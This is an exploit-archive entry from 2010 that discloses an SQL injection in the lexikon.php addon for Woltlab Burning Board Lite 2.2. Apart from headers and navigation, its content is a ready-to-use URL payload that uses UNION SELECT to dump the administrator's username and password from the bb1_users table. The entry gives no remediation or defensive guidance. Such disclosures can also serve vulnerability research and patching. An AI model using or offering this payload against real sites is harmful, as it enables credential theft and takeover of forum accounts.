Woltlab Burning Board Lite Addon (lexikon.php) SQL Injection Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Woltlab Burning Board Lite Addon (lexikon.php) SQL Injection Vulnerability
# Published : 2010-03-21
# Author : n3w7u
# Previous Title : Jewelry Cart Software (product.php) SQL Injection Vulnerability
# Next Title : Fw-BofF (oolime-resurrection) 1.5.3beta Multiple Remote Include Vulnerability

.-=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=-.
  
 ~ Woltlab Burning Board Lite Addon (lexikon.php) SQL Injection Vulnerability  ~
  
.-=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=-.
 
[+] Autor: n3w7u
 
[+] Vulnerabilities [ SQL Injection ]

[+] Page: http://www.mywbb.info/board/thread.php?threadid=125185

[+] Language: [ PHP ]
 
[+] Version: 2.2

[+] Date: 21.03.2010
 

.-=--=--=--=--=--=--=--=--=--=--=-.
 
[+] Vulnerability
 
    lexikon.php?action=show&id=
     
 
[+] Exploitable
 
    http://[host]/[path]/lexikon.php?action=show&id=null+union+select+1,2,3,concat(username,0x3a,password),5,6,7,8+from+bb1_users+where+userid=1--